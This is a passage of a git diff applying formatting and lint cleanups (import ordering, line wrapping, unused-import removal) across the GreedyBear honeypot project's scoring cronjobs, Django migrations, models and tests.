 from django.core.files.storage import FileSystemStorage
-from django.db.models import F, Q
+from django.db.models import Q
+
 from greedybear.cronjobs.base import Cronjob
 from greedybear.cronjobs.scoring.random_forest import RFClassifier, RFRegressor
-from greedybear.cronjobs.scoring.utils import correlated_features, get_current_data, get_data_by_pks, get_features
+from greedybear.cronjobs.scoring.utils import (
+    correlated_features,
+    get_current_data,
+    get_data_by_pks,
+    get_features,
+)
 from greedybear.models import IOC
 from greedybear.settings import ML_MODEL_DIRECTORY
 
@@ -47,7 +52,10 @@ def save_training_data(self) -> None:
         try:
             if self.storage.exists(TRAINING_DATA_FILENAME):
                 self.storage.delete(TRAINING_DATA_FILENAME)
-            self.storage.save(TRAINING_DATA_FILENAME, ContentFile(json.dumps(self.current_data, default=str)))
+            self.storage.save(
+                TRAINING_DATA_FILENAME,
+                ContentFile(json.dumps(self.current_data, default=str)),
+            )
         except Exception as exc:
             self.log.error(f"error saving training data: {exc}")
             raise exc
@@ -110,7 +118,8 @@ def run(self):
             raise TrainingDataError()
 
         current_ips = defaultdict(
-            int, {ioc["value"]: ioc["interaction_count"] - training_ips.get(ioc["value"], 0) for ioc in self.current_data if ioc["last_seen"] > training_date}
+            int,
+            {ioc["value"]: ioc["interaction_count"] - training_ips.get(ioc["value"], 0) for ioc in self.current_data if ioc["last_seen"] > training_date},
         )
 
         self.log.info("extracting features from training data")
@@ -209,7 +218,7 @@ def score_only(self, iocs: list[IOC]) -> int:
             int: Number of objects updated
         """
         iocs = set(iocs)
-        primary_keys = set(ioc.pk for ioc in iocs)
+        primary_keys = {ioc.pk for ioc in iocs}
         data = get_data_by_pks(primary_keys)
         current_date = str(date.today())
         self.log.info("extracting features: score_only")
diff --git a/greedybear/cronjobs/scoring/utils.py b/greedybear/cronjobs/scoring/utils.py
index 174d7ba7..232df1ef 100644
--- a/greedybear/cronjobs/scoring/utils.py
+++ b/greedybear/cronjobs/scoring/utils.py
@@ -3,9 +3,10 @@
 
 import numpy as np
 import pandas as pd
-from api.views.utils import FeedRequestParams, feeds_response
 from django.contrib.postgres.aggregates import ArrayAgg
 from django.db.models import F, Q
+
+from api.views.utils import FeedRequestParams, feeds_response
 from greedybear.models import IOC
 
 
@@ -67,7 +68,7 @@ def get_features(iocs: list[dict], reference_day: str) -> pd.DataFrame:
     result = []
     for ioc in iocs:
         days_seen_count = len(ioc["days_seen"])
-        time_diffs = [date_delta(str(a), str(b)) for a, b in zip(ioc["days_seen"], ioc["days_seen"][1:])]
+        time_diffs = [date_delta(str(a), str(b)) for a, b in zip(ioc["days_seen"], ioc["days_seen"][1:], strict=False)]
         active_timespan = sum(time_diffs) + 1
         result.append(
             {
diff --git a/greedybear/cronjobs/whatsmyip.py b/greedybear/cronjobs/whatsmyip.py
index 3dc00b57..5c2d8d00 100644
--- a/greedybear/cronjobs/whatsmyip.py
+++ b/greedybear/cronjobs/whatsmyip.py
@@ -1,11 +1,15 @@
 import requests
+
 from greedybear.cronjobs.base import Cronjob
 from greedybear.models import IOC, WhatsMyIPDomain
 
 
 class WhatsMyIPCron(Cronjob):
     def run(self) -> None:
-        r = requests.get("https://raw.githubusercontent.com/MISP/misp-warninglists/refs/heads/main/lists/whats-my-ip/list.json", timeout=10)
+        r = requests.get(
+            "https://raw.githubusercontent.com/MISP/misp-warninglists/refs/heads/main/lists/whats-my-ip/list.json",
+            timeout=10,
+        )
         json_file = r.json()
         for domain in json_file["list"]:
             try:
diff --git a/greedybear/migrations/0001_initial.py b/greedybear/migrations/0001_initial.py
index 9ecada37..2967a6d4 100644
--- a/greedybear/migrations/0001_initial.py
+++ b/greedybear/migrations/0001_initial.py
@@ -7,7 +7,6 @@
 
 
 class Migration(migrations.Migration):
-
     initial = True
 
     dependencies = []
diff --git a/greedybear/migrations/0002_ioc_cowrie.py b/greedybear/migrations/0002_ioc_cowrie.py
index c2a5fef4..87b3318c 100644
--- a/greedybear/migrations/0002_ioc_cowrie.py
+++ b/greedybear/migrations/0002_ioc_cowrie.py
@@ -4,7 +4,6 @@
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0001_initial"),
     ]
diff --git a/greedybear/migrations/0003_statistics.py b/greedybear/migrations/0003_statistics.py
index bdc38301..56443050 100644
--- a/greedybear/migrations/0003_statistics.py
+++ b/greedybear/migrations/0003_statistics.py
@@ -6,7 +6,6 @@
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0002_ioc_cowrie"),
     ]
diff --git a/greedybear/migrations/0004_alter_id_field.py b/greedybear/migrations/0004_alter_id_field.py
index c162bd0d..c54b572d 100644
--- a/greedybear/migrations/0004_alter_id_field.py
+++ b/greedybear/migrations/0004_alter_id_field.py
@@ -4,7 +4,6 @@
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0003_statistics"),
     ]
diff --git a/greedybear/migrations/0005_clients.py b/greedybear/migrations/0005_clients.py
index 47592ecf..d53aee90 100644
--- a/greedybear/migrations/0005_clients.py
+++ b/greedybear/migrations/0005_clients.py
@@ -16,7 +16,6 @@ def create_default_clients(apps, schema_editor):
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0004_alter_id_field"),
         # added dependency to enable using models from app2 in move_m1
diff --git a/greedybear/migrations/0006_ioc_general_hps.py b/greedybear/migrations/0006_ioc_general_hps.py
index ae4e668d..b00841dc 100644
--- a/greedybear/migrations/0006_ioc_general_hps.py
+++ b/greedybear/migrations/0006_ioc_general_hps.py
@@ -5,7 +5,6 @@
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0005_clients"),
     ]
diff --git a/greedybear/migrations/0007_generalhoneypot.py b/greedybear/migrations/0007_generalhoneypot.py
index 4b9c545f..7cccfb04 100644
--- a/greedybear/migrations/0007_generalhoneypot.py
+++ b/greedybear/migrations/0007_generalhoneypot.py
@@ -4,7 +4,6 @@
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0006_ioc_general_hps"),
     ]
diff --git a/greedybear/migrations/0008_auto_20230120_1548.py b/greedybear/migrations/0008_auto_20230120_1548.py
index 05b8bea8..45d7076b 100644
--- a/greedybear/migrations/0008_auto_20230120_1548.py
+++ b/greedybear/migrations/0008_auto_20230120_1548.py
@@ -29,7 +29,6 @@ def generalHoneypot(apps, schema_editor):
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0007_generalhoneypot"),
     ]
diff --git a/greedybear/migrations/0009_alter_ioc_general_field.py b/greedybear/migrations/0009_alter_ioc_general_field.py
index 0f950515..e441281f 100644
--- a/greedybear/migrations/0009_alter_ioc_general_field.py
+++ b/greedybear/migrations/0009_alter_ioc_general_field.py
@@ -12,7 +12,6 @@ def migrateData(apps, schema_editor):
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0008_auto_20230120_1548"),
     ]
@@ -31,6 +30,8 @@ class Migration(migrations.Migration):
         migrations.AlterField(
             model_name="ioc",
             name="type",
-            field=models.CharField(choices=[("ip", "Ip"), ("domain", "Domain")], max_length=32),
+            field=models.CharField(
+                choices=[("ip", "Ip"), ("domain", "Domain")], max_length=32
+            ),
         ),
     ]
diff --git a/greedybear/migrations/0010_alter_ioc_related_ioc.py b/greedybear/migrations/0010_alter_ioc_related_ioc.py
index d20ff9b5..d617f69e 100644
--- a/greedybear/migrations/0010_alter_ioc_related_ioc.py
+++ b/greedybear/migrations/0010_alter_ioc_related_ioc.py
@@ -4,15 +4,14 @@
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
-        ('greedybear', '0009_alter_ioc_general_field'),
+        ("greedybear", "0009_alter_ioc_general_field"),
     ]
 
     operations = [
         migrations.AlterField(
-            model_name='ioc',
-            name='related_ioc',
-            field=models.ManyToManyField(blank=True, to='greedybear.ioc'),
+            model_name="ioc",
+            name="related_ioc",
+            field=models.ManyToManyField(blank=True, to="greedybear.ioc"),
         ),
     ]
diff --git a/greedybear/migrations/0011_rename_times_seen_ioc_attack_count_ioc_asn_and_more.py b/greedybear/migrations/0011_rename_times_seen_ioc_attack_count_ioc_asn_and_more.py
index 74bfb540..f18be25d 100644
--- a/greedybear/migrations/0011_rename_times_seen_ioc_attack_count_ioc_asn_and_more.py
+++ b/greedybear/migrations/0011_rename_times_seen_ioc_attack_count_ioc_asn_and_more.py
@@ -1,12 +1,11 @@
 # Generated by Django 4.2.15 on 2024-12-13 17:37
 
 import django.contrib.postgres.fields
-from django.db import migrations, models
 import django.db.models.deletion
+from django.db import migrations, models
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0010_alter_ioc_related_ioc"),
     ]
@@ -25,7 +24,9 @@ class Migration(migrations.Migration):
         migrations.AddField(
             model_name="ioc",
             name="destination_ports",
-            field=django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(), default=list, size=None),
+            field=django.contrib.postgres.fields.ArrayField(
+                base_field=models.IntegerField(), default=list, size=None
+            ),
         ),
         migrations.AddField(
             model_name="ioc",
@@ -45,19 +46,36 @@ class Migration(migrations.Migration):
         migrations.AlterField(
             model_name="ioc",
             name="days_seen",
-            field=django.contrib.postgres.fields.ArrayField(base_field=models.DateField(), blank=True, default=list, size=None),
+            field=django.contrib.postgres.fields.ArrayField(
+                base_field=models.DateField(), blank=True, default=list, size=None
+            ),
         ),
         migrations.CreateModel(
             name="CowrieSession",
             fields=[
-                ("session_id", models.BigIntegerField(primary_key=True, serialize=False)),
+                (
+                    "session_id",
+                    models.BigIntegerField(primary_key=True, serialize=False),
+                ),
                 ("start_time", models.DateTimeField(blank=True, null=True)),
                 ("duration", models.FloatField(blank=True, null=True)),
                 ("login_attempt", models.BooleanField(default=False)),
-                ("credentials", django.contrib.postgres.fields.ArrayField(base_field=models.CharField(blank=True, max_length=256), default=list, size=None)),
+                (
+                    "credentials",
+                    django.contrib.postgres.fields.ArrayField(
+                        base_field=models.CharField(blank=True, max_length=256),
+                        default=list,
+                        size=None,
+                    ),
+                ),
                 ("command_execution", models.BooleanField(default=False)),
                 ("interaction_count", models.IntegerField(default=0)),
-                ("source", models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to="greedybear.ioc")),
+                (
+                    "source",
+                    models.ForeignKey(
+                        on_delete=django.db.models.deletion.CASCADE, to="greedybear.ioc"
+                    ),
+                ),
             ],
         ),
     ]
diff --git a/greedybear/migrations/0014_auto_20250210_1258.py b/greedybear/migrations/0014_auto_20250210_1258.py
index 274b32d1..2176294c 100644
--- a/greedybear/migrations/0014_auto_20250210_1258.py
+++ b/greedybear/migrations/0014_auto_20250210_1258.py
@@ -12,7 +12,7 @@ def removeDdospot(apps, schema_editor):
         if ddospot.active and IOC.objects.filter(general_honeypot=ddospot).exists():
             return
         ddospot.delete()
-    except GeneralHoneypot.DoesNotExist as e:
+    except GeneralHoneypot.DoesNotExist:
         pass
 
 
diff --git a/greedybear/migrations/0015_cowriesession_greedybear__source__a3720f_idx.py b/greedybear/migrations/0015_cowriesession_greedybear__source__a3720f_idx.py
index 58fb07be..af50a31a 100644
--- a/greedybear/migrations/0015_cowriesession_greedybear__source__a3720f_idx.py
+++ b/greedybear/migrations/0015_cowriesession_greedybear__source__a3720f_idx.py
@@ -4,7 +4,6 @@
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0014_auto_20250210_1258"),
     ]
@@ -12,6 +11,8 @@ class Migration(migrations.Migration):
     operations = [
         migrations.AddIndex(
             model_name="cowriesession",
-            index=models.Index(fields=["source"], name="greedybear__source__a3720f_idx"),
+            index=models.Index(
+                fields=["source"], name="greedybear__source__a3720f_idx"
+            ),
         ),
     ]
diff --git a/greedybear/migrations/0017_commandsequence_cowriesession_commands.py b/greedybear/migrations/0017_commandsequence_cowriesession_commands.py
index 5da4be30..a8c7816f 100644
--- a/greedybear/migrations/0017_commandsequence_cowriesession_commands.py
+++ b/greedybear/migrations/0017_commandsequence_cowriesession_commands.py
@@ -16,10 +16,25 @@ class Migration(migrations.Migration):
         migrations.CreateModel(
             name="CommandSequence",
             fields=[
-                ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
+                (
+                    "id",
+                    models.BigAutoField(
+                        auto_created=True,
+                        primary_key=True,
+                        serialize=False,
+                        verbose_name="ID",
+                    ),
+                ),
                 ("first_seen", models.DateTimeField(default=datetime.datetime.utcnow)),
                 ("last_seen", models.DateTimeField(default=datetime.datetime.utcnow)),
-                ("commands", django.contrib.postgres.fields.ArrayField(base_field=models.CharField(blank=True, max_length=1024), default=list, size=None)),
+                (
+                    "commands",
+                    django.contrib.postgres.fields.ArrayField(
+                        base_field=models.CharField(blank=True, max_length=1024),
+                        default=list,
+                        size=None,
+                    ),
+                ),
                 ("commands_hash", models.CharField(blank=True, max_length=64)),
                 ("cluster", models.IntegerField(blank=True, null=True)),
             ],
@@ -27,6 +42,11 @@ class Migration(migrations.Migration):
         migrations.AddField(
             model_name="cowriesession",
             name="commands",
-            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to="greedybear.commandsequence"),
+            field=models.ForeignKey(
+                blank=True,
+                null=True,
+                on_delete=django.db.models.deletion.SET_NULL,
+                to="greedybear.commandsequence",
+            ),
         ),
     ]
diff --git a/greedybear/migrations/0019_alter_commandsequence_first_seen_and_more.py b/greedybear/migrations/0019_alter_commandsequence_first_seen_and_more.py
index 8f558f9d..1df61fe2 100644
--- a/greedybear/migrations/0019_alter_commandsequence_first_seen_and_more.py
+++ b/greedybear/migrations/0019_alter_commandsequence_first_seen_and_more.py
@@ -40,7 +40,11 @@ class Migration(migrations.Migration):
             model_name="statistics",
             name="view",
             field=models.CharField(
-                choices=[("feeds", "Feeds View"), ("enrichment", "Enrichment View"), ("command sequence", "Command Sequence View")],
+                choices=[
+                    ("feeds", "Feeds View"),
+                    ("enrichment", "Enrichment View"),
+                    ("command sequence", "Command Sequence View"),
+                ],
                 default="feeds",
                 max_length=32,
             ),
diff --git a/greedybear/migrations/0020_massscanners.py b/greedybear/migrations/0020_massscanners.py
index 59f227dd..15a4b72e 100644
--- a/greedybear/migrations/0020_massscanners.py
+++ b/greedybear/migrations/0020_massscanners.py
@@ -1,11 +1,11 @@
 # Generated by Django 4.2.20 on 2025-07-13 17:26
 
 import datetime
+
 from django.db import migrations, models
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0019_alter_commandsequence_first_seen_and_more"),
     ]
@@ -14,7 +14,15 @@ class Migration(migrations.Migration):
         migrations.CreateModel(
             name="MassScanners",
             fields=[
-                ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
+                (
+                    "id",
+                    models.BigAutoField(
+                        auto_created=True,
+                        primary_key=True,
+                        serialize=False,
+                        verbose_name="ID",
+                    ),
+                ),
                 ("ip_address", models.CharField(max_length=256)),
                 ("added", models.DateTimeField(default=datetime.datetime.now)),
                 ("reason", models.CharField(blank=True, max_length=64, null=True)),
diff --git a/greedybear/migrations/0021_massscanners_greedybear__ip_addr_2aa484_idx.py b/greedybear/migrations/0021_massscanners_greedybear__ip_addr_2aa484_idx.py
index 3c31766c..4a489d7b 100644
--- a/greedybear/migrations/0021_massscanners_greedybear__ip_addr_2aa484_idx.py
+++ b/greedybear/migrations/0021_massscanners_greedybear__ip_addr_2aa484_idx.py
@@ -4,7 +4,6 @@
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0020_massscanners"),
     ]
@@ -12,6 +11,8 @@ class Migration(migrations.Migration):
     operations = [
         migrations.AddIndex(
             model_name="massscanners",
-            index=models.Index(fields=["ip_address"], name="greedybear__ip_addr_2aa484_idx"),
+            index=models.Index(
+                fields=["ip_address"], name="greedybear__ip_addr_2aa484_idx"
+            ),
         ),
     ]
diff --git a/greedybear/migrations/0022_whatsmyip.py b/greedybear/migrations/0022_whatsmyip.py
index 1c2d925e..6dc2bdad 100644
--- a/greedybear/migrations/0022_whatsmyip.py
+++ b/greedybear/migrations/0022_whatsmyip.py
@@ -1,11 +1,11 @@
 # Generated by Django 4.2.20 on 2025-07-18 17:45
 
 import datetime
+
 from django.db import migrations, models
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0021_massscanners_greedybear__ip_addr_2aa484_idx"),
     ]
@@ -14,12 +14,24 @@ class Migration(migrations.Migration):
         migrations.CreateModel(
             name="WhatsMyIP",
             fields=[
-                ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
+                (
+                    "id",
+                    models.BigAutoField(
+                        auto_created=True,
+                        primary_key=True,
+                        serialize=False,
+                        verbose_name="ID",
+                    ),
+                ),
                 ("domain", models.CharField(max_length=256)),
                 ("added", models.DateTimeField(default=datetime.datetime.now)),
             ],
             options={
-                "indexes": [models.Index(fields=["domain"], name="greedybear__domain_f89b04_idx")],
+                "indexes": [
+                    models.Index(
+                        fields=["domain"], name="greedybear__domain_f89b04_idx"
+                    )
+                ],
             },
         ),
     ]
diff --git a/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py b/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py
index 920dd0a6..94441e2c 100644
--- a/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py
+++ b/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py
@@ -1,12 +1,12 @@
 # Generated by Django 5.2.8 on 2025-12-22 11:24
 
 import datetime
+
 import django.contrib.postgres.fields
 from django.db import migrations, models
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0023_rename_massscanners_massscanner_and_more"),
     ]
@@ -15,7 +15,12 @@ class Migration(migrations.Migration):
         migrations.AddField(
             model_name="ioc",
             name="firehol_categories",
-            field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(blank=True, max_length=64), blank=True, default=list, size=None),
+            field=django.contrib.postgres.fields.ArrayField(
+                base_field=models.CharField(blank=True, max_length=64),
+                blank=True,
+                default=list,
+                size=None,
+            ),
         ),
         migrations.AlterField(
             model_name="statistics",
@@ -34,13 +39,25 @@ class Migration(migrations.Migration):
         migrations.CreateModel(
             name="FireHolList",
             fields=[
-                ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
+                (
+                    "id",
+                    models.BigAutoField(
+                        auto_created=True,
+                        primary_key=True,
+                        serialize=False,
+                        verbose_name="ID",
+                    ),
+                ),
                 ("ip_address", models.CharField(max_length=256)),
                 ("added", models.DateTimeField(default=datetime.datetime.now)),
                 ("source", models.CharField(blank=True, max_length=64, null=True)),
             ],
             options={
-                "indexes": [models.Index(fields=["ip_address"], name="greedybear__ip_addr_e01f2f_idx")],
+                "indexes": [
+                    models.Index(
+                        fields=["ip_address"], name="greedybear__ip_addr_e01f2f_idx"
+                    )
+                ],
             },
         ),
     ]
diff --git a/greedybear/migrations/0025_merge_20251223_2100.py b/greedybear/migrations/0025_merge_20251223_2100.py
index 583eb4b1..6c52daa5 100644
--- a/greedybear/migrations/0025_merge_20251223_2100.py
+++ b/greedybear/migrations/0025_merge_20251223_2100.py
@@ -4,7 +4,6 @@
 
 
 class Migration(migrations.Migration):
-
     dependencies = [
         ("greedybear", "0024_ioc_firehol_categories_alter_statistics_view_and_more"),
         ("greedybear", "0023_rename_massscanners_massscanner_and_more"),
diff --git a/greedybear/models.py b/greedybear/models.py
index 09990f73..88630991 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -79,7 +79,12 @@ def __str__(self):
 class CommandSequence(models.Model):
     first_seen = models.DateTimeField(blank=False, default=datetime.now)
     last_seen = models.DateTimeField(blank=False, default=datetime.now)
-    commands = pg_fields.ArrayField(models.CharField(max_length=1024, blank=True), blank=False, null=False, default=list)
+    commands = pg_fields.ArrayField(
+        models.CharField(max_length=1024, blank=True),
+        blank=False,
+        null=False,
+        default=list,
+    )
     commands_hash = models.CharField(max_length=64, unique=True, blank=True, null=True)
     cluster = models.IntegerField(blank=True, null=True)
 
@@ -93,7 +98,12 @@ class CowrieSession(models.Model):
     start_time = models.DateTimeField(blank=True, null=True)
     duration = models.FloatField(blank=True, null=True)
     login_attempt = models.BooleanField(blank=False, null=False, default=False)
-    credentials = pg_fields.ArrayField(models.CharField(max_length=256, blank=True), blank=False, null=False, default=list)
+    credentials = pg_fields.ArrayField(
+        models.CharField(max_length=256, blank=True),
+        blank=False,
+        null=False,
+        default=list,
+    )
     command_execution = models.BooleanField(blank=False, null=False, default=False)
     interaction_count = models.IntegerField(blank=False, null=False, default=0)
     source = models.ForeignKey(IOC, on_delete=models.CASCADE, blank=False, null=False)
diff --git a/greedybear/tasks.py b/greedybear/tasks.py
index 405d8403..f3c24786 100644
--- a/greedybear/tasks.py
+++ b/greedybear/tasks.py
@@ -1,8 +1,8 @@
 # This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
 # See the file 'LICENSE' for copying permission.
-from __future__ import absolute_import, unicode_literals
 
 from celery import shared_task
+
 from greedybear.settings import CLUSTER_COWRIE_COMMAND_SEQUENCES
 
 
diff --git a/manage.py b/manage.py
index 1d24ff43..1131716f 100644
--- a/manage.py
+++ b/manage.py
@@ -2,6 +2,7 @@
 
 
 """Django's command-line utility for administrative tasks."""
+
 import os
 import sys
 
diff --git a/packages.txt b/packages.txt
new file mode 100644
index 00000000..e69de29b
diff --git a/pyproject.toml b/pyproject.toml
new file mode 100644
index 00000000..79d5a937
--- /dev/null
+++ b/pyproject.toml
@@ -0,0 +1,2 @@
+[tool.ruff]
+extend = ".github/configurations/python_linters/.ruff.toml"
diff --git a/tests/__init__.py b/tests/__init__.py
index 00a68e29..5226f137 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -4,13 +4,20 @@
 
 from certego_saas.apps.user.models import User
 from django.test import TestCase
-from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, iocType
+
+from greedybear.models import (
+    IOC,
+    CommandSequence,
+    CowrieSession,
+    GeneralHoneypot,
+    iocType,
+)
 
 
 class CustomTestCase(TestCase):
     @classmethod
     def setUpTestData(cls):
-        super(CustomTestCase, cls).setUpTestData()
+        super().setUpTestData()
 
         cls.heralding = GeneralHoneypot.objects.create(name="Heralding", active=True)
         cls.ciscoasa = GeneralHoneypot.objects.create(name="Ciscoasa", active=True)
@@ -171,7 +178,7 @@ def setUpTestData(cls):
             cls.regular_user = User.objects.create_user(username="regular", email="regular@greedybear.com", password="regular")
 
     @classmethod
-    def tearDownClass(self):
+    def tearDownClass(cls):
         # db clean
         GeneralHoneypot.objects.all().delete()
         IOC.objects.all().delete()
diff --git a/tests/authentication/test_auth.py b/tests/authentication/test_auth.py
index 29bcbc50..c1103efa 100644
--- a/tests/authentication/test_auth.py
+++ b/tests/authentication/test_auth.py
@@ -68,7 +68,7 @@ def test_logout_204(self):
         )
         self.assertEqual(AuthToken.objects.count(), 1)
 
-        self.client.credentials(HTTP_AUTHORIZATION=("Token %s" % token.token))
+        self.client.credentials(HTTP_AUTHORIZATION=(f"Token {token.token}"))
         response = self.client.post(logout_uri)
 
         self.assertEqual(response.status_code, 204, msg=(response))
@@ -302,7 +302,11 @@ def __register_user(self, body: dict):
 
 class CheckConfigurationTestCase(CustomOAuthTestCase):
     def test_200_local_setup(self):
-        with self.settings(DEFAULT_FROM_EMAIL="fake@email.it", DEFAULT_EMAIL="fake@email.it", STAGE_LOCAL="true"):
+        with self.settings(
+            DEFAULT_FROM_EMAIL="fake@email.it",
+            DEFAULT_EMAIL="fake@email.it",
+            STAGE_LOCAL="true",
+        ):
             # register page has been removed
             # response = self.client.get("/api/auth/configuration?page=register")
             # self.assertEqual(response.status_code, 200)
diff --git a/tests/greedybear/cronjobs/test_firehol.py b/tests/greedybear/cronjobs/test_firehol.py
index 7264f48e..bdbaefb5 100644
--- a/tests/greedybear/cronjobs/test_firehol.py
+++ b/tests/greedybear/cronjobs/test_firehol.py
@@ -1,7 +1,7 @@
 from unittest.mock import MagicMock, patch
 
 from greedybear.cronjobs.firehol import FireHolCron
-from greedybear.models import IOC, FireHolList
+from greedybear.models import FireHolList
 from tests import CustomTestCase
 
 
diff --git a/tests/test_clustering.py b/tests/test_clustering.py
index 3b16e1d7..2585086a 100644
--- a/tests/test_clustering.py
+++ b/tests/test_clustering.py
@@ -1,4 +1,3 @@
-import numpy as np
 from greedybear.cronjobs.commands.cluster import tokenize
 
 from . import CustomTestCase
@@ -61,6 +60,24 @@ def test_tokenize_edge_cases(self):
 
     def test_tokenize_mixed_content(self):
         """Test mixture of various command patterns"""
-        input_seq = ["ls -l;cd /home;pwd", "echo hello   world", ";", "git commit -m 'update'"]
-        expected = ["ls", "-l", "cd", "/home", "pwd", "echo", "hello", "world", "git", "commit", "-m", "'update'"]
+        input_seq = [
+            "ls -l;cd /home;pwd",
+            "echo hello   world",
+            ";",
+            "git commit -m 'update'",
+        ]
+        expected = [
+            "ls",
+            "-l",
+            "cd",
+            "/home",
+            "pwd",
+            "echo",
+            "hello",
+            "world",
+            "git",
+            "commit",
+            "-m",
+            "'update'",
+        ]
         self.assertEqual(tokenize(input_seq), expected)
diff --git a/tests/test_cowrie_extraction.py b/tests/test_cowrie_extraction.py
index 6144dc5b..87e36ff3 100644
--- a/tests/test_cowrie_extraction.py
+++ b/tests/test_cowrie_extraction.py
@@ -5,7 +5,12 @@
 from unittest import TestCase
 from unittest.mock import MagicMock, Mock, patch
 
-from greedybear.cronjobs.extraction.strategies.cowrie import CowrieExtractionStrategy, normalize_command, normalize_credential_field, parse_url_hostname
+from greedybear.cronjobs.extraction.strategies.cowrie import (
+    CowrieExtractionStrategy,
+    normalize_command,
+    normalize_credential_field,
+    parse_url_hostname,
+)
 from greedybear.models import CommandSequence
 
 
diff --git a/tests/test_extraction_strategies.py b/tests/test_extraction_strategies.py
index a69a663d..c5b83f99 100644
--- a/tests/test_extraction_strategies.py
+++ b/tests/test_extraction_strategies.py
@@ -59,7 +59,11 @@ def test_processes_multiple_iocs(self, mock_iocs_from_hits):
 
         hits = [
             {"src_ip": "1.2.3.4", "dest_port": 80, "@timestamp": "2025-01-01T00:00:00"},
-            {"src_ip": "5.6.7.8", "dest_port": 443, "@timestamp": "2025-01-01T00:00:00"},
+            {
+                "src_ip": "5.6.7.8",
+                "dest_port": 443,
+                "@timestamp": "2025-01-01T00:00:00",
+            },
         ]
 
         self.strategy.extract_from_hits(hits)
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 9e1e98a9..77a218a6 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -2,7 +2,13 @@
 from unittest.mock import Mock, patch
 
 from greedybear.consts import DOMAIN, IP
-from greedybear.cronjobs.extraction.utils import correct_ip_reputation, get_ioc_type, iocs_from_hits, is_whatsmyip_domain, threatfox_submission
+from greedybear.cronjobs.extraction.utils import (
+    correct_ip_reputation,
+    get_ioc_type,
+    iocs_from_hits,
+    is_whatsmyip_domain,
+    threatfox_submission,
+)
 from greedybear.models import FireHolList, MassScanner, WhatsMyIPDomain
 
 from . import CustomTestCase, ExtractionTestCase
diff --git a/tests/test_ioc_processor.py b/tests/test_ioc_processor.py
index 038d79bf..b033e592 100644
--- a/tests/test_ioc_processor.py
+++ b/tests/test_ioc_processor.py
@@ -212,7 +212,10 @@ def test_deduplication(self):
 
         result = self.processor._merge_iocs(existing, new)
 
-        self.assertEqual(sorted(result.related_urls), ["http://a.com", "http://b.com", "http://c.com"])
+        self.assertEqual(
+            sorted(result.related_urls),
+            ["http://a.com", "http://b.com", "http://c.com"],
+        )
         self.assertEqual(result.destination_ports, [80, 443, 8080])
 
     def test_updating(self):
diff --git a/tests/test_models.py b/tests/test_models.py
index 553fc8be..ae497437 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -49,7 +49,11 @@ def test_cowrie_session_model(self):
         self.assertEqual(self.cowrie_session.commands.commands, self.cmd_seq)
 
     def test_statistics_model(self):
-        self.statistic = Statistics.objects.create(source="140.246.171.141", view=viewType.ENRICHMENT_VIEW.value, request_date=self.current_time)
+        self.statistic = Statistics.objects.create(
+            source="140.246.171.141",
+            view=viewType.ENRICHMENT_VIEW.value,
+            request_date=self.current_time,
+        )
         self.assertEqual(self.statistic.source, "140.246.171.141")
         self.assertEqual(self.statistic.view, viewType.ENRICHMENT_VIEW.value)
         self.assertEqual(self.statistic.request_date, self.current_time)
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index e1ed30bf..c30f655c 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -1,8 +1,20 @@
 from datetime import datetime
 from unittest.mock import Mock, patch
 
-from greedybear.cronjobs.repositories import CowrieSessionRepository, ElasticRepository, IocRepository, SensorRepository, get_time_window
-from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, Sensor
+from greedybear.cronjobs.repositories import (
+    CowrieSessionRepository,
+    ElasticRepository,
+    IocRepository,
+    SensorRepository,
+    get_time_window,
+)
+from greedybear.models import (
+    IOC,
+    CommandSequence,
+    CowrieSession,
+    GeneralHoneypot,
+    Sensor,
+)
 
 from . import CustomTestCase
 
@@ -228,12 +240,18 @@ def test_save_session_updates_existing(self):
         session.interaction_count = 10
         result = self.repo.save_session(session)
         self.assertEqual(result.interaction_count, 10)
-        self.assertEqual(CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count, 10)
+        self.assertEqual(
+            CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
+            10,
+        )
 
         session.interaction_count = original_interaction_count
         result = self.repo.save_session(session)
         self.assertEqual(result.interaction_count, original_interaction_count)
